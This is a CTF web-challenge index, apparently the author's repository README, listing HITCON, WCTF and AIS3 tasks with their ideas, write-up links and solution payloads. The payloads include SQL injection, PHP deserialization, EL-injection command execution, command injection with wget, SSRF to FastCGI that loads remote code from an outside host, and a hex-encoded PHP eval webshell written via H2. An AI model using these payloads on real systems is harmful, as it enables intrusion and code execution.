**Leaking**\n\nDifficulty: **★★**  \nSolved: **43 / 1024**  \nTag: **WhiteBox**, **JavaScript**, **NodeJS**  \n\n#### Idea\n\n* Break JavaScript Sandbox\n* Use NodeJS `Buffer(int)` to steal uninitialized memory  \n* [Node.js Buffer knows everything](https://github.com/ChALkeR/notes/blob/master/Buffer-knows-everything.md)\n\n#### Source Code\n\n* [here](hitcon-ctf-2016/leaking)\n\n#### Solution\n\n```bash\n$ while true; do curl 'http://1.2.3.4/?data=Buffer(1e4)' | grep -a hitcon; done;\n\n```\n\n#### Write Ups\n\n* [Hello HitCon 2016 CTF](https://ctfs.ghost.io/hello-hitcon-2016-ctf/#leaking)  \n* [HITCON 2016 web 总结](http://0x48.pw/2016/10/14/0x24/)  \n* [hitcon2016 web writeup](http://lorexxar.cn/2016/10/10/hitcon2016/)\n\n\n\n## **BabyTrick**\n\nDifficulty: **★★★**  \nSolved: **24 / 1024**  \nTag: **WhiteBox**, **PHP**, **MySQL**, **SQL Injection**, **Unserialize**\n\n#### Idea\n\n* [Create an Unexpected Object and Don't Invoke \\_\\_wakeup() in Deserialization](https://bugs.php.net/bug.php?id=72663)\n* [SugarCRM v6.5.23 PHP反序列化對象注入漏洞](http://blog.knownsec.com/2016/09/sugarcrm-v6-5-23-php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AF%B9%E8%B1%A1%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/)\n* MySQL UTF-8 collation - `SELECT 'Ä'='a'` is True\n\n#### Source Code\n\n* [here](hitcon-ctf-2016/babytrick)\n\n#### Solution\n\n```bash\n# get password\ncurl http://1.2.3.4/\n?data=O:6:\"HITCON\":3:{s:14:\"%00HITCON%00method\";s:4:\"show\";s:12:\"%00HITCON%00args\";a:1:{i:0;s:39:\"'union%20select%201,2,password%20from%20users%23\";}}\n\n# get flag\ncurl http://1.2.3.4/\n?data=O:6:\"HITCON\":2:{s:14:\"%00HITCON%00method\";s:5:\"login\";s:12:\"%00HITCON%00args\";a:2:{i:0;s:7:\"orÄnge\";i:1;s:13:\"babytrick1234\";}}\n```\n\n#### Write Ups\n\n* [Hitcon 2016 – Baby Trick](http://0xecute.com/index.php/2016/10/10/baby-trick/)\n* [Hello HitCon 2016 CTF](https://ctfs.ghost.io/hello-hitcon-2016-ctf/#babytrick)  \n* [hitcon2016 web writeup](http://lorexxar.cn/2016/10/10/hitcon2016/)\n\n\n\n\n## **Angry Boy**\n\nDifficulty: **★★☆**  \nSolved: **43 / 1024**  \nTag: **GrayBox**, **Java**\n\n#### Idea\n\n* `new String(new byte[] {1, -1, 1, -1})` will output `01EFBFBD01EFBFBD`, not `01FF01FF`\n* [When ‘EFBFBD’ And Friends Come Knocking: Observations Of Byte Array To String Conversions](https://blog.gdssecurity.com/labs/2015/2/18/when-efbfbd-and-friends-come-knocking-observations-of-byte-a.html)\n\n#### Source Code\n\n* [here](hitcon-ctf-2016/angry%20boy)\n\n#### Solution\n\n* [exploit.py](hitcon-ctf-2016/angry%20boy/exploit.py)\n* [decrpt.py](hitcon-ctf-2016/angry%20boy/decrypt.py)\n\n#### Write Ups\n\n* [Angry Boy - Web 300 Problem](https://github.com/pwning/public-writeup/tree/master/hitcon2016/web300-angryboy)\n\n\n## **Angry Seam**\n\nDifficulty: **★★★★**  \nSolved: **4 / 1024**  \nTag: **GrayBox**, **Java**, **Seam Framework**, **CSS RPO**, **EL Injection**, **Java Deserialization**  \n\n#### Idea\n\n* CSS Relative Path Overwrite  \n* Built-in redirection parameter `actionOutcome`  \n* [RPO Gadgets](http://blog.innerht.ml/rpo-gadgets/)  \n* [CVE-2010-1871: JBoss Seam Framework remote code execution](http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html)  \n\n\n#### Source Code\n\n* [here](hitcon-ctf-2016/angry%20seam)\n\n#### Solution\n\n\u003cbr\u003e\n\n**P.s.** I made this challenge because once when I try to review the code of Seam Framework, I found some 0-days and I think it must have more. So I throw out the brick to attract a jade. And the result is more than I expected :P  \n\n\u003cbr\u003e\n\n**Intended solution**  \n\n* Register an account  \n   ```\n   username: `AAAAAA`    \n   password: `AAAAAA`  \n   realname: `{/*';*/}%0a@import'http://orange.tw/?`  \n   ```\n\n* Report URL  \n    ```\n    http://1.2.3.4:8080/angryseam/profile.seam?actionOutcom\u003ee=/profile.seam?username%3dAAAAAA\n    ```\n\n\u003cbr\u003e\n\n**Unintended solution**  \n\n* Register an account  \n* Update description to  \n* Login and access   \n\n```\n/?x=#{expressions.instance().createValueExpression(request.getHeader('cmd')).getValue()}\n```\n\n```\nGET /angryseam/template.seam?actionMethod=template.xhtml:util.escape(sessionScope['user'].getDescription()) HTTP/1.1\nhost: 1.2.3.4\ncmd: #{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),request.getHeader('ccc'))}\nccc: ls -alh\n...\n```\n\n\n**Unintended solution**  \n\n* CVE-2013-2165 Java deserialization vulnerability\n\n\u003cbr\u003e\n\n**Unintended solution**  \n\n* SESSION manipulation... seam SUCKS  \n\n#### Write Ups\n\n* [Web500 Hitconctf 2016 and exploit CVE-2013-2165](http://vnprogramming.com/index.php/2016/10/10/web500-hitconctf-2016-and-exploit-cve-2013-2165/)\n* [Angry Seam (500 pts)](https://github.com/Blaklis/write-ups/tree/master/hitcon)\n\n## **Babyfirst**\n\nSolved: **33 / 969**  \nDifficulty: **★★**  \nTag: **WhiteBox**, **PHP**, **Command Injection**  \n\n#### Idea\n\n* Use `NewLine` to bypass regular expression check  \n* Command injection only with alphanumeric characters  \n\n#### Source Code\n\n* [here](hitcon-ctf-2015/babyfirst)  \n\n```php\n\u003c?php\n    highlight_file(__FILE__);\n\n    $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];\n    if ( !file_exists($dir) )\n        mkdir($dir);\n    chdir($dir);\n\n    $args = $_GET['args'];\n    for ( $i=0; $i\u003ccount($args); $i++ ){\n        if ( !preg_match('/^\\w+$/', $args[$i]) )\n            exit();\n    }\n\n    exec(\"/bin/orange \" . implode(\" \", $args));\n?\u003e\n```\n\n\n#### Solution\n\n```text\nhttp://localhost/\n?args[0]=x%0a\n\u0026args[1]=mkdir\n\u0026args[2]=orange%0a\n\u0026args[3]=cd\n\u0026args[4]=orange%0a\n\u0026args[5]=wget\n\u0026args[6]=846465263%0a\n\nhttp://localhost/\n?args[0]=x%0a\n\u0026args[1]=tar\n\u0026args[2]=cvf\n\u0026args[3]=aa\n\u0026args[4]=orange%0a\n\u0026args[5]=php\n\u0026args[6]=aa\n```\n\nAnd there are also lots of creative solutions, you can check the write ups below.  \n\n\n#### Write Ups\n\n* [babyfirst (web 100)](https://github.com/pwning/public-writeup/blob/master/hitcon2015/web100-babyfirst/writeup.md)  \n* [HITCON CTF 2015 Web 100 Web 300 Writeup](http://5alt.me/posts/2015/10/HITCON%20CTF%202015%20Web%20100%20Web%20300%20Writeup.html)  \n* [HITCON 2015 Quals: Babyexploit](https://kt.pe/blog/2015/10/hitcon-2015-quals-babyexploit/)  \n* [Babyfirst (web, 100p, ?? solves)](https://github.com/p4-team/ctf/tree/master/2015-10-18-hitcon/web_100_babyfirst#eng-version)  \n\n\n\n## **nanana**\n\nDifficulty: **★★★**  \nSolved: **18 / 969**  \nTag: **GrayBox**, **C**, **PWN**  \n\n#### Idea\n* Pwn without library  \n* Format String without output  \n* Bypass Stack Guard by using overflow `ARGV[1]`  \n\n#### Source Code\n\n* [here](hitcon-ctf-2015/nanana/)  \n\n#### Solution  \n\n* [exploit.py](hitcon-ctf-2015/nanana/exploit.py)  \n\n#### Write Ups\n\n* [nanana (pwn, web 200)](https://github.com/pwning/public-writeup/blob/master/hitcon2015/web200-nanana/writeup.md)  \n* [HITCON 2015 Quals: Nanana](https://kt.pe/blog/2015/10/hitcon-2015-quals-nanana/)  \n* [Pwning (sometimes) with style - Dragons’ notes on CTFs](http://j00ru.vexillium.org/blog/24_03_15/dragons_ctf.pdf)  \n\n\n## **Giraffe's Coffee**\n\nDifficulty: **★★★☆**  \nSolved: **16 / 969**  \nTag:  **WhiteBox**, **PHP**  \n\n#### Idea\n* Break PHP PRNG  \n* Break shared PRNG STATE in Apache Prefork mode  \n\n#### Source Code\n\n* [here](hitcon-ctf-2015/giraffe's-coffee)  \n\n#### Solution  \n\n    TBD\n\n#### Write Ups\n\n* [HITCON CTF 2015 Web 100 Web 300 Writeup](http://5alt.me/posts/2015/10/HITCON%20CTF%202015%20Web%20100%20Web%20300%20Writeup.html)\n* [Giraffe's Coffee - Web 300 Problem - Writeup by Robert Xiao (@nneonneo)](https://github.com/pwning/public-writeup/blob/master/hitcon2015/web300-giraffes-coffee/readme.md)\n* [HITCON 2015 WEB 300](https://docs.google.com/document/d/1NlCF4jykgwuUMkr0I8HjbLRUKNAGf6jzRiI2D9TyumA/edit)\n\n\n## **lalala**\n\nDifficulty: **★★★☆**  \nSolved: **2 / 969**  \nTag: **BlackBox**, **PHP**, **SSRF**  \n\n#### Idea\n\n* Bypass SSRF restrictiton with 302 redirect  \n* Exploit FASTCGI protocol by using GOPHER  \n\n#### Source Code  \n\n* [here](hitcon-ctf-2015/lalala)  \n\n#### Solution    \n\n```php\n\u003c?php\nheader( \"Location: gopher://127.0.0.1:9000/x%01%01Zh%00%08%00%00%00%01%00%00%00%00%00%00%01%04Zh%00%86%00%00%0E%03REQUEST_METHODGET%0F%0ASCRIPT_FILENAME/www/a.php%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%09%26PHP_VALUEauto_prepend_file%20%3D%20http%3A//orange.tw/x%01%04Zh%00%00%00%00%01%05Zh%00%00%00%00\" );\n```\n\n#### Write Ups  \n\n* [HITCON CTF 2015 Web 100 Web 300 Writeup](http://5alt.me/posts/2015/10/HITCON%20CTF%202015%20Web%20100%20Web%20300%20Writeup.html)  \n* [Hitcon 2015 lalala web400 task](https://docs.google.com/document/d/1eALKwCyogM5Mw_D4qWe48X-PAGZw_2vT82aP0EPIr-8/mobilebasic?pli=1)  \n\n\n## **Use-After-FLEE**  \n\nSolved: **1 / 969**  \nDifficulty: **★★★★☆**  \nTag: **WhiteBox**, **PHP**, **UAF**, **PWN**  \n\n#### Idea\n\n* Bypass open_basedir  \n* Bypass disable_functions  \n* PHP use-after-free exploit writing  \n* Bypass full protection (DEP / ASLR / PIE / FULL RELRO)  \n* [Yet Another Use After Free Vulnerability in unserialize() with SplDoublyLinkedList](https://github.com/80vul/phpcodz/blob/master/research/pch-034.md)  \n\n#### Source Code  \n\n* [here](hitcon-ctf-2015/use-after-flee)  \n\n#### Solution    \n\n    TBD\n\n#### Write Ups\n\n* [Use-After-FLEE (pwn, web 500)](https://github.com/pwning/public-writeup/blob/master/hitcon2015/web500-use-after-flee/writeup.md)\n\n\n## **PUSHIN CAT**\n\nSolved: **8 / 1020**  \nDifficulty: **★★**  \nPlatform:  **BlackBox**, **PHP**, **H2**, **SQL Injection**  \n\n#### Idea  \n\n* SQL Injection on H2 Database  \n* Execute Code by using H2 SQL Injection  \n\n#### Source Code\n\n* [here](hitcon-ctf-2014/pushincat)    \n\n#### Solution  \n\n    TBD\n\n#### Write Ups\n\n* [HITCON CTF 2014: PUSHIN CAT](https://github.com/ctfs/write-ups-2014/tree/master/hitcon-ctf-2014/pushin-cat)\n* [HITCON CTF 2014 - PUSHIN CAT (H2 DB Insert SQL Injection)](https://www.youtube.com/watch?v=KNs5ZZo31P8)\n* [HITCON CTF 2014](http://mage-ctf-writeup.blogspot.tw/2014/08/hitcon-ctf-2014.html)\n\n\n## **PY4H4SHER**\n\nSolved: **30 / 1020**  \nDifficulty: **★★☆**  \nTag: **WhiteBox**, **Python**, **Collision**, **HPP**  \n\n#### Idea\n\n* Python CGI HTTP Pollution  \n* MySQL old_password hash collisions  \n* [PBKDF2+HMAC hash collisions explained](https://mathiasbynens.be/notes/pbkdf2-hmac)  \n\n#### Source Code  \n\n* [here](hitcon-ctf-2014/py4h4sher)  \n\n#### Solution    \n\n    TBD  \n\n#### Write Ups  \n\n* [HITCON CTF 2014: PY4H4SHER](https://github.com/ctfs/write-ups-2014/tree/master/hitcon-ctf-2014/py4h4sher)  \n* [HITCON CTF 2014: PY4H4SHER WRITEUP](http://blog.st3phn.com/2014/08/hitcon-ctf-2014-py4h4sher-writeup.html)  \n* [py4h4sher_solution.py](http://pastebin.com/DCbJ0qzi)  \n* [HITCON CTF 2014](http://mage-ctf-writeup.blogspot.tw/2014/08/hitcon-ctf-2014.html)  \n\n\n## **LEENODE**  \n\nSolved: **2 / 1020**  \nDifficulty: **★★★**  \nTag: **BlackBox**, **ColdFusion**, **Apache**  \n\n#### Idea  \n\n* Multilayered architecture vulnerability  \n* Double Encoding  \n\n#### Source Code  \n\n* [here](hitcon-ctf-2014/leenode)  \n\n#### Solution  \n\n```bash\n# get password\n$ curl http://1.2.3.4/admin%252f%252ehtpasswd%2500.cfm\n\n# get flag\n$ curl http://1.2.3.4/admin/thefl4g.txt \n\n```\n\n#### Write Ups  \n\n* [HITCON CTF 2014: LEENODE](https://github.com/ctfs/write-ups-2014/tree/master/hitcon-ctf-2014/leenode)  \n* [(web) LEENODE [250]](http://cdepillabout.github.io/ctf/2014/hitcon/leenode/writeup.html)  \n* [CTF/Writeup/HITCON2014/LEENODE](https://wiki.mma.club.uec.ac.jp/CTF/Writeup/HITCON2014/LEENODE)  \n\n\n## **BlackBox**\n\nSolved: **0 / 12**  \nDifficulty: **★★★★**  \nTag: **GrayBox**, **PHP**, **JAVA**, **mod_jk**, **H2**, **SQL Injection**, **WAF**  \n\n#### Idea  \n\n* Multilayered architecture vulnerability  \n* Default and up to date mod_jk leads to directory travesal  \n* Bypass WAF by incorrect usage of BASE64 and URLENCODE  \n* SQL Injection on H2 Database  \n* Execute Code by using H2 SQL Injection  \n\n#### Source Code  \n\n* [here](wctf-2016/BlackBox)  \n\n#### Solution  \n\n* Get source code  \n   ```text\n   http://1.2.3.4/login/..;/\n   ```\n\n* Review code and find a way to bypass WAF  \n   ```bash\n   $ curl \"http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,version(),null--\"\n   $ curl \"http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_read('/etc/apache2/sites-enabled/000-default.conf'),null--\"\n   ```  \n\n* Write shell  \n    ```bash\n    $ curl \"http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_write('3c3f706870206576616c28245f504f53545b6363635d293b3f3e', '/www/write_shell_here_=P/.a.php'),null--\"\n    $ curl \"http://1.2.3.4/write_shell_here_=P/.a.php\" -d 'phpinfo();'\n    ```\n\n#### Write Ups  \n\n    TBD\n\n\n\n## **SQLPWN**  \n\nSolved: **0 / ??**  \nDifficulty: **★★★**  \nTag: **WhiteBox**, **PHP**, **SQL Injection**, **LFI**, **Race Condition**  \n\n#### Idea  \n\n* One-byte off SQL Injection  \n* Race Condition  \n* Local file inclusion with PHP session  \n\n#### Source Code  \n\n* [here](ais3-final-2015/sqlpwn)  \n\n#### Solution  \n\n* Run [exploit.py](ais3-final-2015/sqlpwn/exploit.py) to win race condition\n\n* Login and SQL Injection\n\n   ```bash\n   $ curl http://1.2.3.4/sqlpwn.php -d 'title=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\\\u0026note=, concat(0x3a3a3a3a3a3a,(select pass from users where name=0x6f72616e6765)))#'\n   ```\n\n* Local file inclusion with session\n   ```bash\n   $ curl http://1.2.3.4/sqlpwn.php?mode=admin\u0026boom=../../../../../../var/lib/php5/sess_243220\n   ```  \n\n#### Write Ups  \n\n* [AIS3 Final CTF Web Writeup (Race Condition \u0026 one-byte off SQL Injection)](http://blog.orange.tw/2015/09/ais3-final-ctf-web-writeup-race.html)  \n* [AIS3 CTF Final Web1 \u0026 Web2](https://docs.google.com/document/d/1n-8LHsxJ6o1-Pr1ISKYyopcfLoUIQcF5CcZGl7KLbPY/edit)  \n\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Forangetw%2Fmy-ctf-web-challenges","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Forangetw%2Fmy-ctf-web-challenges","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Forangetw%2Fmy-ctf-web-challenges/lists"}